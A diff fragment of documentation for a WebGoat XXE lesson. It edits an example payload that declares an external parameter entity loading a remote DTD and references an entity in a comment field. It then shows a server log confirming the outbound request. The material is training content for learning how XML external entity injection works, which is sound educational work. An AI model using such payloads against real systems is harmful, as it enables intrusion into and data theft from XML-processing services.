-<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/attack.dtd">
+<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/XXE/attack.dtd">
 %remote;
 ]>
-<user>
-  <username>test&ping;</username>
-</user>
+<comment>
+  <text>test&ping;</text>
+</comment>
 ----
 
 Now if we check our server log we will see:
@@ -48,7 +48,8 @@ Now if we check our server log we will see:
 GET Java/1.8.0_101 HelloWorld
 ----
 
-So with the XXE we are able to ping our own server which means XXE injection is possible.
+So with the XXE we are able to ping our own server which means XXE injection is possible. So with the XXE injection
+we are basically able to reach the same effect as we did in the beginning with the curl command.
 
 [NOTE]
 In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will